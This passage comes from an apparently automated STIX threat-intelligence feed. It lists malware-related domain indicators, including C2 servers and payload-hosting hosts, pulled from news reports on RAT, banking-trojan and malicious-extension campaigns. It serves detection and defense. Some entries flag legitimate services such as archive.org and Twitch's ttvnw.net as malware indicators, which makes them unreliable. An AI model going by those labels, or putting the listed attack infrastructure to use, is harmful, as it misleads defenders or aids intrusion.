'existencediscussion.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e29267d0-56cb-457f-9e6e-02b1a2809129","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: expansionsalt.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ructure Domain connect.existencediscussion[.]info ; connect.expansionsalt[.]info ; connect.fangstitch[.]xyz ; connect.fogparcel[.]info ; c","pattern":"[domain-name:value = 'expansionsalt.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--94d0196d-f826-42c8-9089-2411fb396ede","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: extentrack.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro Hijacker rule delivery, telemetry,","pattern":"[domain-name:value = 'extentrack.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6494a345-aa5f-4c16-8bf1-3100868ceff9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: filescloud.pro","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: xspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]c","pattern":"[domain-name:value = 'filescloud.pro']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7ebf52a4-d2a2-46bf-8cd4-528ab421364b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: filexspace.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: helake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud","pattern":"[domain-name:value = 'filexspace.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f9882adf-287c-4d90-a84b-e1f6de0abccd","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: filexstorage.site","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: sfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ;","pattern":"[domain-name:value = 'filexstorage.site']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c2e526de-48f5-4fed-8c77-12164375ddb7","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: finersto.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro","pattern":"[domain-name:value = 'finersto.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--163484db-6e1e-4cc2-8b82-c54d2e531229","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: fuelleg.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: lview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]in","pattern":"[domain-name:value = 'fuelleg.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1874da1c-c57c-412e-9900-0dd3a70fdb25","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ggclicker.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: es[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-access SEO-poisoning and fak","pattern":"[domain-name:value = 'ggclicker.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0f12ac09-ced7-46f5-988e-b8aa661c17bd","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: mifilesx.site","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watcha","pattern":"[domain-name:value = 'mifilesx.site']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--49ce71d0-a118-40e5-9803-36ca08cf8629","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: minewave.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: traw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]x","pattern":"[domain-name:value = 'minewave.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--29e2106c-0e1c-497e-ae22-171e58e3371d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: mqsearch.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro Hijacker rule de","pattern":"[domain-name:value = 'mqsearch.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a9d5cfbf-1f5c-4e7a-93d4-5568bbd8d8e7","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: needcherries.online","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader installation-tracker infrastructure Domain ve","pattern":"[domain-name:value = 'needcherries.online']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--89994f6b-1b90-41e0-936f-9797bae43eec","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: noiseship.cfd","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: earch hijacking, callback, and script infrastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]co","pattern":"[domain-name:value = 'noiseship.cfd']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--92a6143a-34eb-42cd-b5e5-fe5e593c41a4","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: pcsdkflyer.ca","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ia RAT stage hosts and Python-agent C2 typosquat Domain reg.pcsdkflyer[.]ca ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info","pattern":"[domain-name:value = 'pcsdkflyer.ca']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d6760a7b-90c5-4e86-bb11-14da909b0088","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: placespoon.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader installation-tracker","pattern":"[domain-name:value = 'placespoon.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--83299860-8519-4b8d-b13e-57950a5feb19","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: statementtouch.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ake file-hosting infrastructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader payload handoff and second-s","pattern":"[domain-name:value = 'statementtouch.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4b3e8ce2-a568-49d5-a6e1-0196ebfb1e12","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: stryper.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: cro\\ Docro Chrome extension installation path URL hxxps[:]//stryper[.]info/t.ps1 Stage-two PowerShell installer for Insomnia RAT URL","pattern":"[domain-name:value = 'stryper.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2081c2e9-d83a-4170-817c-50c530e107df","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: suitstraw.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nd-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[","pattern":"[domain-name:value = 'suitstraw.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5c5bd7f3-e078-4bbe-b144-b4e377a0bebb","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: trickflag.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ad handoff and second-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsyste","pattern":"[domain-name:value = 'trickflag.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1690d8c9-70dc-411e-9e8c-6a3012f59501","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: vendralo.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: eg.pcsdkflyer[.]ca ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; dr","pattern":"[domain-name:value = 'vendralo.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--82044537-d8d0-4ec5-8995-8244429583b9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: venrx.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ot[.]com ; venrx.blogspot[.]com ; venrxhub.blogspot[.]com ; venrx[.]xyz ; ravexoffical.blogspot[.]com ; adex-blog.blogspot[.]com","pattern":"[domain-name:value = 'venrx.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a0270fa-b8db-475c-a000-f86310865fb7","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: vesselsystem.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ckflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]inf","pattern":"[domain-name:value = 'vesselsystem.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9627f1ec-2a1d-40e1-b3aa-b807f304e8c9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: voyagemist.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: s SEO-poisoning and fake file-hosting infrastructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader paylo","pattern":"[domain-name:value = 'voyagemist.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--179eb50e-c378-4204-a472-037b0066d435","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: watchadvance.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: x[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-access SEO-poisoning and fake file-hosting infras","pattern":"[domain-name:value = 'watchadvance.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c84ee125-b354-4be0-b3ae-5cd1a5413e15","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: xrsdownload.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-ac","pattern":"[domain-name:value = 'xrsdownload.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--81eefb9c-1a0b-4b83-932f-55dfd438a7a6","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: zippyfiles.net","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclic","pattern":"[domain-name:value = 'zippyfiles.net']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a6fcd43a-db0b-4d6c-b178-d789178f302c","created":"2026-09-14T07:24:39.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ttvnw.net","description":"Seen in \"Malicious Twitch Browser Extension Leaks OAuth Tokens From Nearly 31,000 Users\" (The Hacker News). Context: es so by routing Twitch's video-playlist requests to \"usher.ttvnw[.]net\" through operator-controlled proxy servers along with the","pattern":"[domain-name:value = 'ttvnw.net']","pattern_type":"stix","valid_from":"2026-09-14T07:24:39.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/malicious-twitch-browser-extension.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c21026ec-4e52-4a91-bc0a-42be558ebf8c","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 128.200.178.68.host.secureserver.net","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: 94ad5dcd271aa86f08cb2b8374203ecc67015af7ca6057244390 Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Domain 13[.]189[.]202[.]64[.]host[.]secureserve","pattern":"[domain-name:value = '128.200.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cf35120c-ccbe-4f23-bc2e-eb550c95eac0","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 13.189.202.64.host.secureserver.net","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: ain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Domain 13[.]189[.]202[.]64[.]host[.]secureserver[.]net IP address 72[.]167[.]48[.]63 IP address 209[.]","pattern":"[domain-name:value = '13.189.202.64.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a679b038-5a82-4c90-b4e1-5e2aa6416b27","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: archive.org","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: 35a1ca0987/{campaignId} .NET PE Injector sub-module hxxps://archive[.]org/download/hotelmoskva/hotelmoskva.jpg SentinelMemoryScanne","pattern":"[domain-name:value = 'archive.org']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--676e00c4-b659-4603-be56-05805cb4747d","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: connection.upgradeonline.site","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: passing the campaign ID. In this sample, the URL is hxxps://connection[.]upgradeonline[.]site . Loader beacons to C2 Second stage: persistence and th","pattern":"[domain-name:value = 'connection.upgradeonline.site']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--87d0b5eb-f0ea-47ae-810c-aab9d562b8cd","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: granderevolucao.store","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: licious browser extension installer payload main-v2 hxxps://granderevolucao[.]store/5c92d3b8734b4f498752f735a1ca0987/{campaignId} .NET PE Inj","pattern":"[domain-name:value = 'granderevolucao.store']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--97ee7c72-97d1-4eeb-8ded-bb85e2d80e9d","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ia601808.us.archive.org","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: legit SentinelOne binary for side-loading sentinel hxxps://ia601808[.]us[.]archive[.]org/5/items/sentinel_20260722_0435/Sentinel.jpg After the","pattern":"[domain-name:value = 'ia601808.us.archive.org']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--be32a064-be07-4a71-9d00-6c0b32a75612","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: volmira.site","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: abA6740d07b . The extension and main-v2 parameters returned volmira[.]site and zaviro[.]online , respectively. Notably, the main-v2","pattern":"[domain-name:value = 'volmira.site']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--562e21c8-3d38-47bb-a98f-2ce7bb514f7b","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: www.creamp1eonlyfans.net","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: ting to download a page from the unregistered domain hxxp://www[.]creamp1eonlyfans[.]net . Because this domain should not return any content, a","pattern":"[domain-name:value = 'www.creamp1eonlyfans.net']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security 